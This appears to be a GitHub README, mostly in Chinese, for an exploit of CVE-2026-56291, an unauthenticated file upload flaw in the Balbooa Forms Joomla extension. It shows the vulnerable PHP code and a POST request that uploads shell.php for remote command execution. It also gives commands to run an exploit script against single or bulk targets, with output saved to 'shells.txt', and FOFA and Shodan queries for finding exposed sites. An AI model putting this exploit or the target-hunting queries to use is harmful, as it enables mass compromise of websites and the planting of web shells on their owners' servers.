CVE-2026-56291 是 Balbooa Forms (com_baforms) Joomla 扩展 (< 2.4.1) 中的一个严重(CVSS 9.8)未认证任意文件上传漏洞。
前端任务 form.uploadAttachmentFile 没有调用 Session::checkToken() 或执行任何权限检查。上传的文件直接使用攻击者的扩展名:$fileName = $name . '.' . $ext。文件保存到 images/baforms/uploads/form-{id}/ 目录中 —— 可直接作为 PHP 执行。
| 版本 | 状态 |
|---|---|
| 1.0 – 2.4.0 | 存在漏洞 |
| 2.4.1+ | 已修复 |
CISA KEV: 添加于 2026 年 7 月 10 日 —— 已确认被积极利用。
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext; // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup
FOFA: body="com_baforms"
Shodan: http.html:"baforms"
| 资源 | 链接 |
|---|---|
| CISA KEV | cisa.gov/known-exploited-vulnerabilities |
| 修复详情 | mysites.guru |
| 研究人员 | Phil Taylor |
与 Balbooa 无关。